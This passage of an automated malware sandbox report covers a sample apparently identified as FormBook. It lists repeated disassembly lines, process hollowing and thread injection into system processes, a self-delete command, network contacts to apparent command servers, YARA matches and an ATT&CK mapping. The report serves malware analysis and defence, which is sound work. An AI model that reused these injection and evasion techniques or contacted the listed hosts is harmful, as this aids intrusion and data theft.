          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05177794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05177794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05177794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05108794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05128E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0518FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05138EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05114120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05177016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05177016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05177016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 154.201.212.113 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.87.1.159 80
          Source: C:\Windows\explorer.exeDomain query: www.marryobaidanjum.com
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.54 80
          Source: C:\Windows\explorer.exeDomain query: www.plafon.one
          Source: C:\Windows\explorer.exeDomain query: www.tcheaptvwdmall.com
          Source: C:\Windows\explorer.exeDomain query: www.scgcarriers.com
          Source: C:\Windows\explorer.exeDomain query: www.customtiletables.com
          Source: C:\Windows\explorer.exeDomain query: www.velvetlaceextensions.com
          Source: C:\Windows\explorer.exeDomain query: www.trueandbare.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.144.21.92 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.215.126.147 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.16.13.194 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeDomain query: www.pinnacleautism.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.180.243 80
          Source: C:\Windows\explorer.exeDomain query: www.jarsofjoybylinathomas.com
          Source: C:\Windows\explorer.exeDomain query: www.astromaritravel.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\OrderKLB210568.exeSection loaded: unknown target: C:\Users\user\Desktop\OrderKLB210568.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\OrderKLB210568.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\OrderKLB210568.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\OrderKLB210568.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\OrderKLB210568.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\OrderKLB210568.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\OrderKLB210568.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 12B0000
          Source: C:\Users\user\Desktop\OrderKLB210568.exeProcess created: C:\Users\user\Desktop\OrderKLB210568.exe 'C:\Users\user\Desktop\OrderKLB210568.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
          Source: explorer.exe, 00000004.00000000.697916766.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.686288903.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemorySecurity Software Discovery131Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
